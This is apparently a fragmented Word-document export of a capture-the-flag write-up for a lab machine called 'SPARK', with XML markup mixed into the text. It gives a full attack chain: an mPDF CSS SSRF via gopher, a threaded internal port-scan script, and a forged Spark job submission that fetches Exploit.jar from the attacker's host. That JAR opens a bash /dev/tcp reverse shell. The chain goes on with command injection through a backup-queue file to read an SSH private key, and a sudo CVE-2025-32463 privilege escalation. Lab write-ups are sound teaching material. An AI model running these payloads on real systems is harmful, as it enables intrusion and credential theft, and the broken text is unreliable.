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e3alcaxdf4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SPARK machine. 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4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q2539xb0o6y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enumeration of the machine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which ports were open on the application.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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view the web application running. This application renders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 to generate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files.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8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8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brute-force scan of files and subdomains was performed, and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composer.json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discovered.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//&lt;MACHINE-IP&gt;/FUZZ -w quickhits.txt -c -t 100 -fl 10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composer.json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mPDF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library was identified, responsible for rendering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content into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8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library,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misconfiguration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also identified that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CSS code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making it possible to exploit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Request Forgery (SSRF)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https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/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&lt;style&gt;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body {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background: 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&lt;/style&gt;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intercepting the request with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observe the submission of a parameter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render.php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is responsible for generating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06600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Therefore, it was possible to use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perform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internal port scan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by exploiting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 protocol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identification of which ports were open in the internal network.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threading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queue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"http://&lt;MACHINE-IP&gt;/render.php"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proxies = {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'http://127.0.0.1:8080'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'http://127.0.0.1:8080'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open_ports = []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lock = threading.Lock()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 = Queue()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tune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TIMEOUT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seconds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 in range(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queue.put(p)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 scan():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not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queue.empty():</w:t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port = queue.get_nowait()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except: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 = {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&lt;style&gt;body {{background: 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'gopher://127.0.0.1:{port}/'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);}}&lt;/style&gt;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init = time.time()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r = requests.post(url, data=data, proxies=proxies, timeout=TIMEOUT)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elapsed = time.time() - init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if elapsed &gt; 2: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with lock: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[OPEN?] PORT = {port} | TIME = {elapsed:.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  <w:tab/>
        <w:t xml:space="preserve">open_ports.append(port)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except requests.exceptions.Timeout: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elapsed = time.time() - init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with lock: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  <w:tab/>
        <w:t xml:space="preserve">print(f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[OPEN] PORT = {port} | TIME = {elapsed:.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}s (timeout)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open_ports.append(port)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except requests.exceptions.RequestException as e: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[ERROR] PORT = {port} | {e}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queue.task_done()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 = []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_ in range(THREADS):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 = threading.Thread(target=scan)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t.daemon = True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t.start()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threads.append(t)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t in threads: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t.join()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\n[*] Potentially open ports: {open_ports}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9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80, 6066, 7077, and 8081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 as open, all related to </w:t>
      </w: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Apache Spark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services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Apache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6066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exposes the route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/v1/submissions/create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this endpoint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job submissions for execution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this functionality, it is possible to submit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previously compiled Java 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will be executed by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Spark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may run commands on the system.</w:t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Exploit.java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created containing the code that will be executed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Then the file is compiled for use during the exploitation stage.</w:t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compile the exploit,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OpenJDK 21.0.10 (2026-01-20)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9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java.io.IOException;</w:t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 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 {</w:t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try {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Runtime.getRuntime().exec(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String[]{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"/bin/bash"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"bash -i &gt;&amp; /dev/tcp/&lt;MACHINE-IP&gt;/443 0&gt;&amp;1"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 catch (IOException e) {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e.printStackTrace();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javac Exploit.java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jar cf Exploit.jar Exploit.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9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generate the correct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request,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script was used containing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payload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responsible for creating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content is sent to the service, which then requests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allowing its execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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urllib.parse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Your JAR exploit configuration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exploit_data = {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"CreateSubmissionRequest"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"clientSparkVersion"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"3.5.1"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# Match the version you saw in the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error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earlier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"appResource"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"http://&lt;VPN-IP&gt;/Exploit.jar"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"environmentVariables"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"SPARK_ENV_LOADED"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"1"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"mainClass"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"Exploit"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"spark.jars"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"http://VPN-IP&gt;/Exploit.jar"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"spark.driver.supervise"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"false"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"spark.app.name"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"l1z4rd_pwn"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"spark.submit.deployMode"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"cluster"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"spark.master"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"spark://127.0.0.1:7077"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json_payload = json.dumps(exploit_data)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 Manual HTTP Header construction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http_request = (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 /v1/submissions/create HTTP/1.1\r\n"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"Host: 127.0.0.1:6066\r\n"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"Content-Type: application/json\r\n"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Content-Length: {len(json_payload)}\r\n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"Connection: close\r\n"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"\r\n"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{json_payload}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Encode for Gopher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gopher_payload = urllib.parse.quote(f"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_{http_request}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gopher_url = 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gopher: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//127.0.0.1:6066/{gopher_payload}"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print(gopher_url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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parse.py</w:t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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Gopher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request was sent to the web application, triggering the payload responsible for interacting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9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Shortly afterward, a request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Exploit.jar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observed, followed by the reverse connection received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60400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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9700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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dnte3mco3hho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—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interactive TTY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obtained.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perl -e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 "/bin/sh";'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 raw -echo;fg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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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.dockerenv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o ambiente em execução é um contêiner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Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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root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directory 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.dockerenv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indicating that the environment is running inside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container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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10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/var/backups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relevant files were found, including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process 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folder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also identified, indicating that the command had already been executed previously inside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processing queue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this service is running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 machine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may be possible to exploit its functionality to perform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 escalation from the container to the Docker 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10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10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verify whether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mechanism was running on the system, a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teste.backup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 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to observe if the process would be automatically triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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teste.backup</w:t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 -n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../backup_manager.log</w:t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observed that the file was not only created but that the command inside it was also executed by the system — in this case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behavior confirms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automatic execution of the file content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characterizing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vulnerability.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then possible to read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where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it was verified whether this user had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available to allow remote access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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'cat${IFS}/etc/passwd'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teste.backup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user possessed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After obtaining access to this key, it was possible to login into the machine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user.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 /ho??/svc_back??/.s??/id_r*'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 /var/backups/queue/cg.backup</w:t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0"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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 directory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/home/svc_backup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re2d1ykselmn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—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version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available on the machine was verified using the command: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sudo --version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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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identified version of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1.9.15,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which is associated with the vulnerability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CVE-2025-32463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this vulnerability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 escalation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Since the target machine does not have internet connectivity, the exploit was first downloaded on the attacker's machine and then transferred to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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 -r&lt;MACHINE-IP&gt;/CVE-2025-32463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//github.com/zinzloun/CVE-2025-32463</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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7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executed,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vertical privilege escalation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51100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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this point,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access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 and consequently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79600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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9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0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Park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9.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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image" Target="media/image28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9.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spark-apache-org.translate.goog/?_x_tr_sl=en&amp;_x_tr_tl=pt&amp;_x_tr_hl=pt&amp;_x_tr_pto=t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8kluu1LymQ6dGnWFMiqXsoTX0A==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLmxlM2FsY2F4ZGY0bzIOaC5kcTI1Mzl4YjBvNnkyDmguZG50ZTNtY28zaGhvMg5oLnJlMmQxeWtzZWxtbjIOaC42dnJvZ29ybTM2cTk4AHIhMU9CV2dOMWVrbUJDZFFudTNSMy16bmllaDNFdW9fSWht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